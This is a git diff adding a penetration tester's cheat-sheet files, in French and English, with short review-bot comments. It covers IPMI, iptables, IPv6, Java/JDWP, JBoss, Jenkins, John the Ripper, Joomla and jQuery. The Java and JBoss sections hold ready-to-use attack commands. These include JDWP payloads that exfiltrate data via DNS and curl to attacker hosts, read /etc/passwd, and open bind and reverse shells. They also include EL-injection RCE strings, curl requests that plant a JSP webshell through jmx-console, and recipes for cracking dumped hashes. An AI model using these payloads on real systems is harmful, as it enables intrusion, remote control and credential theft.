+
+* Metasploit modules
+auxiliary/scanner/ipmi/ipmi_cipher_zero
+Détecte si l'attaque par cipher 0 est possible
+
+auxiliary/scanner/ipmi/ipmi_dumphashes
+Demande gentillement les hashes au service :)
+
+exploit/multi/upnp/libupnp_ssdp_overflow
+Exploite la vulnerabilité "Supermicro IPMI UPnP Vulnerability"
diff --git a/Cheat Sheet/iptables b/Cheat Sheet/iptables
new file mode 100644
index 0000000..d070cb0
--- /dev/null
+++ b/Cheat Sheet/iptables
@@ -0,0 +1,19 @@
+# iptables
+
+# liste des codes icmp
+iptables -p icmp -h
+
+# nat
+# autoriser le VM a faire du DNS et rediriger ses requetes vers 80/TCP dans
+# burp avec :
+# - cocher support invisible
+# - decocher loopback only
+iptables -t nat -A PREROUTING -s 192.168.56.99/32 -i vboxnet0 -p udp -m udp --dport 53 -j DNAT --to-destination 8.8.8.8
+iptables -t nat -A PREROUTING -s 192.168.56.99/32 -i vboxnet0 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8282
+iptables -t nat -A POSTROUTING -d 8.8.8.8/32 -j MASQUERADE
+
+# forward outsider to VM
+-t nat -A PREROUTING -i em1 -p tcp --dport 2222 -j DNAT --to-destination 192.168.122.48:22
+-t filter -A FORWARD -o virbr0 -d 192.168.122.0/24 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT # let through responses from internet back to VMs
+-t filter -A FORWARD -o virbr0 -d 192.168.122.48 -p tcp -m conntrack --ctstate NEW --dport 22 -j ACCEPT
+
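Review bot: The three rules under `# forward outsider to VM` (the `-t nat -A PREROUTING -i em1 ...` line and the two `-t filter -A FORWARD ...` lines) are missing the `iptables` command itself, so they cannot be pasted as written; prefix each with `iptables`, e.g. `iptables -t nat -A PREROUTING -i em1 -p tcp --dport 2222 -j DNAT --to-destination 192.168.122.48:22`. Because they use `-A`, they are appended after whatever is already in FORWARD; if that chain already ends in a REJECT rule (libvirt typically installs one for virbr0) the appended ACCEPTs are never reached and `-I` is needed, which deserves a comment beside them. A short comment recording the expected FORWARD default policy would also make clear what else on em1 can reach 192.168.122.0/24 once forwarding is on.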
diff --git a/Cheat Sheet/ipv6 b/Cheat Sheet/ipv6
new file mode 100644
index 0000000..6903b83
--- /dev/null
+++ b/Cheat Sheet/ipv6
@@ -0,0 +1,21 @@
+# ipv6
+
+# disable/enable
+sysctl -w net.ipv6.conf.all.disable_ipv6=1
+
+google-public-dns-a.google.com. 83236 IN AAAA 2001:4860:4860::8888
+
+# archilnux
+/boot/grub/grub.cfg: linux /boot/vmlinuz-linux root=UUID=de6e883e-0cd4-4a0a-8f26-12360f2c3ecf ro ipv6.disable=1
+
+# ipv4 to ipv6 tunnel
+www.tunnelbroker.net (l: lanjelot@gmail.com)
+modprobe ipv6 (module may be built in kernel)
+ip tunnel add he-ipv6 mode sit remote 216.66.84.46 local my.public.ip.v4 ttl 255
+ip link set he-ipv6 up
+ip addr add 2001:470:1f14:10a9::2/64 dev he-ipv6
+ip route add ::/0 dev he-ipv6
+ip -f inet6 addr
+
+# http proxy to ipv6
+http://maroueneboubakri.blogspot.com.au/2014/02/olympic-ctf-sochi-2014-curling100.html
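Review bot: The `www.tunnelbroker.net (l: ...)` line commits a personal account login to the repository; the broker username belongs in a local note rather than a shared cheat sheet, so drop the parenthetical and keep only the site. The `sysctl -w net.ipv6.conf.all.disable_ipv6=1` line under `# disable/enable` only lasts until reboot; add `# runtime only - persist via /etc/sysctl.d/ or the ipv6.disable=1 kernel parameter below` so the reader does not assume it sticks. The `remote 216.66.84.46` and `2001:470:1f14:10a9::2/64` values in the tunnel block are presumably account-specific; marking them as placeholders would avoid copy-paste mistakes.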
diff --git a/Cheat Sheet/java b/Cheat Sheet/java
new file mode 100644
index 0000000..5337c81
--- /dev/null
+++ b/Cheat Sheet/java
@@ -0,0 +1,285 @@
+# java
+
+# decompiler / editor / debugger
+http://www.javadecompilers.com/
+https://github.com/Storyyeller/Krakatau
+https://github.com/Konloch/bytecode-viewer.git
+http://jode.sourceforge.net/
+
+# coverity source code java audit
+https://code-spotter.com/
+
+# JDK_HOME JAVA_HOME
+/usr/lib/jvm/oracle-jdk-1.7.0_13
+
+# download old versions from archive
+http://www.oracle.com/technetwork/java/javase/archive-139210.html
+
+# java class file version
+major minor Java platform version
+45 3 1.0
+45 3 1.1
+46 0 1.2
+47 0 1.3
+48 0 1.4
+49 0 1.5
+50 0 1.6
+
+# hibernate
+http://blog.h3xstream.com/2014/02/hql-for-pentesters.html
+http://0ang3el.blogspot.com.au/2015/12/zeronights-0x05.html
+http://static.sstic.org/rumps2015/SSTIC_2015-06-04_P12_RUMPS_09_Factorisation.{mp4,pdf}
+\'' (MySQL)
+' -- ' (https://twitter.com/_unread_/status/609311174170181632)
+$$'' (Oracle/H2 https://twitter.com/Agarri_FR/status/609523917875752960)
+
+* getTemplate().find("FROM ..." + url_param1)
+vuln but you can't make subqueries
+
+* getSession().createSQLQuery("select * from blah where id = " + url_param1) or createQuery (to confirm)
+vuln and you can make subqueries
+
+# system properties
+System.getProperties().list(System.out);
+
+# jdwp
+http://seclists.org/nmap-dev/2010/q1/867
+https://github.com/schierlm/JavaPayload/ (http://schierlm.users.sourceforge.net/JavaPayload/)
+https://gist.github.com/hugsy/7868799
+http://www.hsc-news.com/archives/2013/000109.html LSV
+https://github.com/rapid7/metasploit-framework/pull/3407 msf/java_jdwp_debugger
+
+java -Xrunjdwp:server=y,transport=dt_socket,address=4000,suspend=n -cp . HelloWorld
+or
+java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=1234 -cp . HelloWorld
+
+port is random if address= not specified
+
+jdwp-shellifier massscan ports: 8000,8787,8788,9009,7777,8453,5005,3999,5000,18000,9001
+
+Developer | Product Default TCP port Version
+----------+--------------------------------------------------------
+Apache | Tomcat *:8000 7.0.52
+Apache | Tomcat localhost:8000 8.0.3
+Red Hat | JBoss EAP *:8787 6.2.0
+Red Hat | JBoss AS *:8787 7.1.1
+Red Hat | JBoss WildFly *:8787,*:8788 8.0.0
+Oracle | GlassFish *:9009 4.0
+IBM | WebSphere Application Server *:7777 8.5.5
+Oracle | Oracle WebLogic Server *:8453 12c
+ | Filemaker *:3999
+ce qui marche vraiment
+threads
+thread 0x1
+where
+thread 0x2
+where
+pick a function that is not called by too many threads and place a breakpoint on it with "stop in"
+
+jdb -attach 192.168.111.208:7000
+> help
+> version
+> classpath
+> trace go methods
+> untrace
+
+> threads
+> thread 0x1
+> suspend 0x1
+> where
+> class|methods|fields javaapplication6.JavaApplication6
+> resume
+
+> stop in javaapplication6.JavaApplication6.main
+Breakpoint hit: "thread=main", javaapplication6.JavaApplication6.main(), line=19 bci=0
+
+main[1] print new java.lang.String("Blah").length()
+ new java.lang.String("Blah").length() = 4
+
+main[1] print java.lang.System.getProperty("user.name")
+ java.lang.System.getProperty("user.name") = "Administrator"
+
+print new java.lang.Runtime().exec("dig hello.d2t.attacker.com")
+print new java.lang.Runtime().exec("curl http://attacker.com/hello")
+
+- ProcessBuilder may not be listed in classes, but try use it anyway
+- ProcessBuilder may not be available if not loaded by the JVM, I would get error "No class named: java.lang.ProcessBuilder" (ie. nobody does import java.lang.ProcessBuilder).
+- java.util.Arrays.asList might not be avail depending on java version, use "".split("_") instead
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "dig yes.d2t.attacker.com")).start() OK
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "dig $USER.asdf.d2t.attacker.com")).start() OK fmserver
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "dig uid$UID.asdf.d2t.attacker.com")).start() OK 502
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "nc -vlnp 3999 < /tmp/.f|/bin/sh > /tmp/.f 2>&1")).start()
+
+- inband
+print new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(java.util.Arrays.asList("bash","-c","cat /etc/passwd|tr \\n @")).start().getInputStream(),"UTF-8"),1000000).readLine()
+print new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(java.util.Arrays.asList("bash","-c","cat /etc/passwd|gzip -f|base64 -w0")).start().getInputStream())).readLine()
+openssl base64
+
+- bind shell
+print new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(java.util.Arrays.asList("bash","-c","mkfifo /tmp/.f")).start().getInputStream())).readLine()
+print new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(java.util.Arrays.asList("bash","-c","nc -l 4000 < /tmp/.f|sh > /tmp/.f 2>&1")).start().getInputStream())).readLine()
+
+- reverse shell
+print new java.lang.Runtime().exec("/usr/sfw/bin/wget -O /home/wasusr/.t.sh http://10.6.6.6:8080/demo/.t.sh")
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "telnet 10.6.6.6 8888 | /bin/sh | telnet 10.6.6.6 9999")).start()
+
+- Runtime instead of ProcessBuilder
+print new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())).readLine()
+print new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())).skip(32).readLine()
+print new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("bashXX-cXXuname -a 2>&1".split("XX")).getInputStream())).readLine()
+
+print new java.lang.Runtime().exec("bash -c id>/tmp/id.txt")
+print new java.lang.Runtime.getRuntime().exec("bash_-c_uname -a>/tmp/uname.txt".split("_"))
+print new java.io.BufferedReader(new java.io.FileReader("/tmp/uname.txt")).readLine()
+
+print new java.io.FileWriter("/tmp/b.txt").append("asdf asdfasdfasdf asdf@asdf").flush()
+
+# dymanic code execution using class loader
+http://www.hsc-news.com/archives/2010/000074.html LSV
+
+ try{
+ /* Construction des URL où chercher */
+ URL[] classUrls = {
+ new URL("http://evil/remote.jar")
+ };
+
+ /* Instanciation du classloader avec les URL */
+ URLClassLoader urlLoader = new URLClassLoader(classUrls);
+
+ /* Chargement et instanciation de la classe malveillante */
+ Class cls = urlLoader.loadClass("hsc.Remote");
+ Object malicious = cls.newInstance();
+
+ /* Invocation de la méthode malveillante */
+ Method maliciousMethod = cls.getMethod("print");
+ System.out.println(maliciousMethod.invoke(malicious));
+ } catch(Exception e) {
+ e.printStackTrace();
+ }
+
+Le code malveillant n'est plus présent ni dans l'application ni dans une
+bibliothèque du classpath et réalise pourtant des opérations potentiellement
+malveillantes :
+
+ package hsc;
+
+ import java.io.*;
+
+ public class Remote {
+ public String print() {
+ Process proc;
+ BufferedReader output;
+ StringBuilder result = new StringBuilder();
+ String[] cmdArray = {"/bin/bash", "-c", "id"};
+
+ try {
+ proc = Runtime.getRuntime().exec(cmdArray);
+ output = new BufferedReader(
+ new InputStreamReader(proc.getInputStream())
+ );
+
+ char buffer[] = new char[8192];
+ int lenRead;
+
+ while ((lenRead = output.read(buffer, 0, buffer.length)) > 0) {
+ for (int i = 0; i < lenRead; i++) {
+ result.append(buffer[i]);
+ }
+ }
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ return result.toString();
+
+ }
+ }
+
+# jsf - Java Server Faces
+* decode viewstate
+https://github.com/SpiderLabs/deface.git (https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2010-001/?fid=3765)
+
+* oracle padding decryption
+POET
+Inyourface
+
+# jboss seam / jsf
+* expression language injection via remote inclusion
+
+${"".getClass().forName('java.lang.Runtime').getDeclaredMethods()[14].invoke("".getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null), param.test)}
+
+http://docs.oracle.com/javaee/6/tutorial/doc/gjddd.html used by the JSF framework
+
+* EL injection via actionOutcome (CVE-2010-1871)
+http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html https://bugzilla.redhat.com/show_bug.cgi?id=615956 http://www.cvedetails.com/cve/CVE-2010-1871/
+
+test: GET /vuln/home.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23{expressions.getClass().forName('java.lang.Runtime')}
+vuln: Location: /vuln/pwn.seam?pwned=class+java.lang.Runtime
+fix: developers blacklisted # and { characters in actionOutcome, but can be bypassed via actionMethod + double EL injection
+
+* actionMethod + double EL injection
+someone hinted it would be possible back in 2010 http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html?showComment=1285586160417#c3222807404834356400
+the bypass 0day was exploited during hitcon-ctf-quals-2016 Angry Seam
+
+update user description to: /?a=#{expressions.instance().createValueExpression(request.getQueryString()).getValue()}
+then access /angryseam/template.seam?x=#{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('Cmd'))}&actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) + send header Cmd: ping blah
+
+1st condition: need a page that will eval actionMethod=
+2nd condition: need another page to store our first EL
+
+https://github.com/seam2/jboss-seam/blob/f3077fee9d04b2b3545628cd9e6b58c859feb988/jboss-seam/src/main/java/org/jboss/seam/navigation/Pages.java#L674
+line 708 is the first evaluation and line 710 will evaluate again
+
+forever vuln because not maintained anymore: https://github.com/seam2/jboss-seam/commit/965d4f3ea4dd527a41402f4758878de02d5ede7d
+
+* CVE-2013-2165 java deserialization in Richfaces 3.3.3Final // http://vnprogramming.com/index.php/2016/10/10/web500-hitconctf-2016-and-exploit-cve-2013-2165/
+vuln: in richfaces-impl-3.3.3.Final.jar:org.ajax4jsf.resource.ResourceBuilderImpl.class
+test: GET /jboss-seam-jpa/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js (jpa is an example app in Jboss seam 2.2.1Final
+exploit: http://localhost:8082/jboss-seam-jpa/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxx
+Tomcat (or JBoss) detects prefix /a4j and routes request to Richfaces
+Richfaces uses ResourceBuilderImple to parse g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxx
+skips g/3.3.3.Final and grabs resource path org/richfaces/renderkit/html/scripts/skinning.js as well as descompress+deserialize the xxxxxxxxx after DATA/
+use ysoserial and compress+base64 encode to generate xxxxxxxxx
+
+# JSP Expression Language
+JSP EL is a specification, there are many implementations (e.g. OGNL in struts2/webwork, Spring SpEL, JBoss EL, MVEL)
+only since the JSP 2.0 specification has EL been available within JSP pages directly
+however, it can and has been used in non-view use cases
+https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf
+http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/
+can be turned off since Spring 3.0.6 and above by setting the springJspExpressionSupport context parameter to false in web.xml
+turned off by default since Spring Framework 3.1 onwards when running on Servlet 3.0 or higher
+
+# jnlp
+download jar files from a jnlp file: https://code.google.com/p/jnlpdownloader/
+
+# rmi
+http://www.accuvant.com/blog/exploiting-jmx-rmi
+https://github.com/mogwaisec/mjet
+https://labs.portcullis.co.uk/tools/rmiinfo/
+also see msf and nmap exploits
+
+# jd-gui
+find -type f -print0 | xargs -0 sed -i -e 's,^[[:space:]]*/\*[^*]\+\*/ ,,'
+
+# java all the vulns
+https://bitbucket.org/ilmila/j2eescan/
+
+# deserialization
+http://blog.cr0.org/2009/05/write-once-own-everyone.html
+http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
+https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-serialization/
+https://github.com/federicodotta/Java-Deserialization-Scanner (scanner for burp)
+https://github.com/njfox/Java-Deserialization-Exploit
+https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet (reference *)
+
+# jrun
+rce if http://1.2.3.4/a;.jsp or /a%253bjsp gives a 404 error by Jrun instead of Apache
+
+# jsp
+http://www.owasp.org/index.php?title=Category:OWASP_JSP_Testing_Tool_Project
+
+# groovy
+java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("hehe").getText()
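Review bot: The `-Xrunjdwp:...address=4000` and `-agentlib:jdwp=...address=1234` examples give a bare port, and what that exposes depends on the JDK: on JDK 8 and earlier a bare port listens on every interface, while from JDK 9 it binds to localhost unless written `address=*:4000`; recording that next to the `port is random if address= not specified` line would make the default-port table below it more useful for judging what is actually reachable. The `# dymanic code execution using class loader` heading has a typo (`dynamic`), and `descompress+deserialize` in the Richfaces entry should read `decompress`. The `jdwp-shellifier massscan ports:` line presumably means `masscan`.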
diff --git a/Cheat Sheet/javascript b/Cheat Sheet/javascript
new file mode 100644
index 0000000..e124811
--- /dev/null
+++ b/Cheat Sheet/javascript
@@ -0,0 +1,8 @@
+# javascript
+
+# extract urls
+https://github.com/nahamsec/JSParser
+
+# deobfucate
+http://jsnice.org/
+http://jsbeautifier.org/
diff --git a/Cheat Sheet/jboss b/Cheat Sheet/jboss
new file mode 100644
index 0000000..9599f46
--- /dev/null
+++ b/Cheat Sheet/jboss
@@ -0,0 +1,118 @@
+# jboss
+
+# quick links
+http://synacktiv.com/ressources/Intrusion_JBoss_AS_MISC.pdf
+http://www.hsc-news.com/archives/2013/000102.html
+http://lab.mediaservice.net/notes_more.php?id=JBOSS_more
+http://www.hsc.fr/ressources/presentations/sstic10_jboss/sstic10_jboss_article.pdf
+http://www.redteam-pentesting.de/publications/jboss
+http://www.openwall.com/lists/oss-security/2014/03/31/1
+
+# bon resume des CVE
+http://seclists.org/oss-sec/2014/q1/702
+
+# info gath
+jboss.system:type=ServerConfig
+
+# RCE CVE-2010-1871
+jboss admin console vuln to auth bypass because based on the seam/jsf framework (Jboss 5.1 to 6.1.0 Final concerned)
+see ./java
+
+# RMI calls w/ twiddle
+./bin/twiddle.sh -o localhost get "jboss.system:type=ServerInfo"
+./jimmix.sh -i http://jboss/invoker/JMXInvokerServlet get "jboss.system:type=ServerInfo" OSVersion
+
+# jboss6 and jmxinvokerservlet
+./bin/twiddle.sh -o localhost invoke "jboss.web:type=Manager,host=localhost" listSessionIds # No MBean matches for query: jboss.web:type=Manager,host=localhost
+./bin/twiddle.sh -o localhost invoke "jboss:name=SystemProperties,type=Service" showAll # no security manager: RMI class loader disabled
+./bin/twiddle.sh -o localhost invoke "jboss.admin:service=DeploymentFileRepository" store xxxyyy.war xxxyyy .jsp ThisIsATest True # from blog but "No MBean matches for query: jboss.admin:service=DeploymentFileRepository"
+./bin/twiddle.sh -o localhost invoke "jboss.system:service=MainDeployer" deploy http://127.0.0.1/appli.war
+
+# BSH if outbound conns denied
+./bin/twiddle.sh -o localhost invoke "jboss.deployer:service=BSHDeployer" createScriptDeployment "`cat redteam.bash`" redteam.bsh # to test
+./bin/twiddle.sh -o localhost invoke "jboss.system:service=MainDeployer" deploy file:/tmp/redteam.war
+
+# read jboss/server/default/conf/props/jmx-console-users.properties
+* jimmix
+./jimmix.sh -P 127.0.0.1:8082 -i http://x.x.x.x/invoker/JMXInvokerServlet invoke jboss:name=SystemProperties,type=Service load file:///d:/apps/jboss-4.2.3.GA/server/default/conf/props/jmx-console-users.properties
+./jimmix.sh -P 127.0.0.1:8082 -i http://x.x.x.x/invoker/JMXInvokerServlet invoke jboss:name=SystemProperties,type=Service showAll (stacktrace but see response in proxy)
+* redteam tools
+use burp or socat to redirect to https
+./webconsole_invoker.rb -u http://127.0.0.1:8008/web-console/Invoker -i load -s "java.lang.String" -p file:///opt/jboss/jboss-4.2.3.GA/server/default/conf/props/jmx-console-users.properties jboss:name=SystemProperties,type=Service
+./webconsole_invoker.rb -u http://127.0.0.1:8008/web-console/Invoker -i showAll jboss:name=SystemProperties,type=Service
+
+# lister les jsessionid
+mbeanServer.invoke(new ObjectName("jboss.web:type=Manager,host=localhost"), "listSessionIds", null, null) // see hsc-news
+
+# scanner des jmx-console
+http://FILE0:8080/jmx-console/style_master.css
+
+# info gathering
+clusterd
+msf auxiliary/scanner/http/jboss_vulnscan
+nmap http-vuln-cve2010-0738.nse
+/web-console/ServerInfo.jsp
+
+/status
+/jmx-console/HtmlAdaptor
+/web-console/Invoker
+/invoker/JMXInvokerServlet
+
+verb tampering
+
+# webshell via jmx-console
+* MainDeployer
+http://127.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%253Aservice%253DMainDeployer&methodIndex=17&arg0=http%3A%2F%2F6.6.6.6%2Fpub%2FWSTest.war
+
+* DeploymentFileRepository MBean
+curl -v http://127.0.0.1:8080/jmx-console/HtmlAdaptor -d 'action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=wstestdepl.war&argType=java.lang.String&arg1=wstestdepl&argType=java.lang.String&arg2=.jsp&argType=java.lang.String' --data-urlencode arg3@code/NetBeansProjects/WSTest.war.jsp -d 'argType=boolean&arg4=True'
+curl -v http://127.0.0.1:8080/wstestdepl/wstestdepl.jsp
+curl -v http://127.0.0.1:8080/wstest/
+
+* webshell le plus simple possible mais on verra pas le resultat des commandes (exemple du paper 2010 redteam)
+curl -X HEAD -v 'http://127.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25Runtime.getRuntime%28%29.exec%28request.getParameter%28%22c%22%29%29%3B%25%3E%0A&argType=boolean&arg4=True'
+curl -v 'http://127.0.0.1:8080/shell/shell.jsp?c=touch%20%2ftmp%2fowned.txt'
+
+cleanup:
+/wstest/ETest -d 'c=rmdir+f:\jboss-4.2.3.GA\server\default\deploy\management\wstestdepl.war+/S+/Q'
+/wstest/ETest -d 'c=rmdir+f:\jboss-4.2.3.GA\server\default\work\jboss.web\localhost\wstestdepl+/S+/Q'
+/wstest/ETest -d 'c=rmdir+f:\jboss-4.2.3.GA\server\default\work\jboss.web\localhost\wstest+/S+/Q'
+/wstest/ETest -d 'c=del+f:\jboss-4.2.3.GA\server\default\deploy\management\wstest.war'
+
+# deployer webshell via JMXInvokerServlet a la mano
+http://breenmachine.blogspot.com.au/2013/09/jboss-jmxinvokerservlet-exploit.html
+http://breenmachine.blogspot.com.au/2014/02/jboss-jbxinvoker-servlet-update.html
+
+# securiser jmx & web consoles
+https://community.jboss.org/wiki/SecureTheJmxConsole
+https://community.jboss.org/wiki/SecureJBoss
+worm: https://community.jboss.org/blogs/mjc/2011/10/20/statement-regarding-security-threat-to-jboss-application-server
+sec-script-0.1.zip
+
+# audit
+liste des fichiers à récupérer d'après CVS/guides/Jboss/audit_jboss.txt
+
+# JMX Console
+/opt/jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml
+/opt/jboss/server/default/conf/props/jmx-console-users.properties
+
+# Web Console
+/opt/jboss/server/default/deploy/management/console-mgr.sar/web-console.war/WEB-INF/web.xml
+/opt/jboss/server/default/conf/login-config.xml
+
+/opt/jboss/server/default/conf/props/jmx-console-users.properties
+/opt/jboss/server/default/conf/props/jmx-console-roles.properties
+
+/opt/jboss/server/default/conf/props/web-console-users.properties
+/opt/jboss/server/default/conf/props/web-console-roles.properties
+
+/opt/jboss/server/default/conf/jboss-service.xml
+
+# recuperer tous les fichiers login-config.xml
+/opt/jboss/server/default/conf/login-config.xml
+
+# tout recuperer
+find -type f ! \( -name '*.jar' -o -name '*.war' \) -print0 -o -type d -print0 | xargs -0 tar cf /path/to/jboss.tar
+
+# JBoss6 & JMXInvokerServlet
+http://docs.jboss.org/jbosssecurity/docs/6.0/security_guide/html/chap-Consoles_and_Invokers.html
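Review bot: The `# audit` file list repeats itself: `/opt/jboss/server/default/conf/props/jmx-console-users.properties` appears under both `# JMX Console` and `# Web Console`, and `/opt/jboss/server/default/conf/login-config.xml` appears under `# Web Console` and again under `# recuperer tous les fichiers login-config.xml`. Listing each path once (the web-console group already pairs users/roles files) makes it easier to verify the collection is complete. The `# securiser jmx & web consoles` section cites `sec-script-0.1.zip` with no origin; a URL or path comment would make that remediation reference actionable.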
diff --git a/Cheat Sheet/jenkins b/Cheat Sheet/jenkins
new file mode 100644
index 0000000..98aa94e
--- /dev/null
+++ b/Cheat Sheet/jenkins
@@ -0,0 +1,7 @@
+# jenkins
+
+* rce - service allows to run Groovy script through the Jenkins Script Console
+http://blog.dewhurstsecurity.com/2014/12/09/how-i-hacked-facebook.html
+
+* rce - deserialization
+https://blogs.securiteam.com/index.php/archives/3171
diff --git a/Cheat Sheet/john b/Cheat Sheet/john
new file mode 100644
index 0000000..45ce2c2
--- /dev/null
+++ b/Cheat Sheet/john
@@ -0,0 +1,34 @@
+# john the ripper
+
+# format
+http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
+
+# incremental avec un charset [a-z0-9]{6,8}
+-- creer un john.pot avec une seule ligne:
+*6C03989037359284236EED9F551513C28869CAD5:abcdefghijklmnopqrstuvwxyz0123456789
+$ echo -n abcdefghijklmnopqrstuvwxyz0123456789 | openssl dgst -sha1 -binary | openssl dgst -sha1 | tr '[a-z]' '[A-Z]'
+6C03989037359284236EED9F551513C28869CAD5
+-- creer le fichier alnum_az09.chr
+$ john --make-charset=alnum_lower.chr
+-- creer une nouvelle section dans john.conf
+[Incremental:alnum_lower]
+File = $JOHN/alnum_lower.chr
+MinLen = 6
+MaxLen = 8
+CharCount = 36
+-- lancer john en incremental
+john -i=alnum_lower path/to/pw_file
+
+# casser du LM/NT et decouvrir la vraie casse ("true case") des mots de passe
+-- isoler les empreintes LM et NT qu'il reste à casser
+john -format:lm -show=left dc01_fgdump.pw > dc01_lm.pw
+john -format:nt -show=left dc01_fgdump.pw > dc01_nt.pw
+-- casser les empreintes avec john et rcrack
+-- creer le dico des mots de passe trouvés pour LM
+john -show dc01_lm.pw | grep ':' | cut -d: -f2- | sort -u > fgdump_lm.dic
+john -show=left -format:nt dc01_fgdump.pw > dc01_nt.pw
+-- trouver la vraie casse
+john -format:nt -rules:nt -w:fgdump_lm.dic dc01_nt.pw
+
+# vBulletin
+john -field-separator-char=';'
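Review bot: The incremental recipe is internally inconsistent: the comment says `-- creer le fichier alnum_az09.chr` but the command and the `[Incremental:alnum_lower]` section use `alnum_lower.chr`; change the comment to `-- creer le fichier alnum_lower.chr`. The `john -show=left -format:nt dc01_fgdump.pw > dc01_nt.pw` line under `-- creer le dico` duplicates the earlier `john -format:nt -show=left dc01_fgdump.pw > dc01_nt.pw` and overwrites the same file, so it should be dropped or commented as a refresh after the rcrack step. The steps also depend on order (`--make-charset` reads the single-line john.pot created just above it, and the `[Incremental:alnum_lower]` section must exist before `-i=alnum_lower` resolves); a one-line comment stating that would help.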
diff --git a/Cheat Sheet/joomla b/Cheat Sheet/joomla
new file mode 100644
index 0000000..8ca3e5b
--- /dev/null
+++ b/Cheat Sheet/joomla
@@ -0,0 +1,38 @@
+# joomla
+
+# sqli
+https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0
+there are other sqlis in recent versions stfw
+
+# check vulnerable plugins/extensions
+http://vel.joomla.org/
+https://docs.joomla.org/Joomla_3.1_version_history
+
+# joomla = 1.5.12
+http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities
+
+# joomla <= 1.5.12
+http://www.securityfocus.com/archive/1/505231
+
+# joomla < 3.6.4 admin-level account creation bypass
+https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2
+
+## extensions
+# RSForm!Pro
+https://www.rsjoomla.com/joomla-extensions/joomla-form.html
+https://www.rsjoomla.com/support/documentation/view-knowledgebase/125-changelog.html
+https://www.rsjoomla.com/forum/37-rsform-pro.html
+https://www.rsjoomla.com/blog/view/229-we-have-changed-the-way-we-keep-track-of-new-versions.html (Rev20==1.2.0, Rev30==1.3.0, Rev40==1.4.0, Rev49==1.49.0 and no more RevXX 1.49.1, 1.49.2 ...)
+
+# Pretty Photo, slprettyphoto (Starlite)
+* xss CVE-2013-6837 prettyPhoto 3.1.4 and earlier
+search for rel="pretty
+then exploit with adding: #prettyPhoto[ADAPTME]/2,/
+https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc # but there's a typo lol
+
+version 3.1.5 downloadable at http://www.no-margin-for-errors.com/projects/prettyPhoto-jquery-lightbox-clone/ fixes the vuln and is typo-free (according to http://www.saotn.org/prettyphoto-dom-based-xss/)
+source is at: https://github.com/scaron/prettyphoto (ref to no-margin-for-errors.com in README.md)
+
+# remember me cookies contain username + password XOR'ed with $secret from configuration.php
+http://seclists.org/fulldisclosure/2013/Jun/149
+however on 3.1.0 there is no option to submit remember=1 in POST
diff --git a/Cheat Sheet/jquery b/Cheat Sheet/jquery
new file mode 100644
index 0000000..d4cada9
--- /dev/null
+++ b/Cheat Sheet/jquery
@@ -0,0 +1,12 @@
+# jquery
+
+* CVE-2011-4969 xss in jQuery before 1.6.3
+https://bugs.jquery.com/ticket/9521
+PoC http://vuln/# https://github.com/ctfs/write-ups-2014/tree/master/csaw-ctf-2014/hashes
+
+http://www.securityweek.com/developers-fix-xss-vulnerability-jquery-validation-plugin-script
+jquery-validation/demo/captcha/index.php
+-
+
+
diff --git a/Cheat Sheet/kitrap0d b/Cheat Sheet/kitrap0d
new file mode 100644
index 0000000..0f0af51
--- /dev/null
+++ b/Cheat Sheet/kitrap0d
@@ -0,0 +1,7 @@
+# kitrap0d
+
+http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
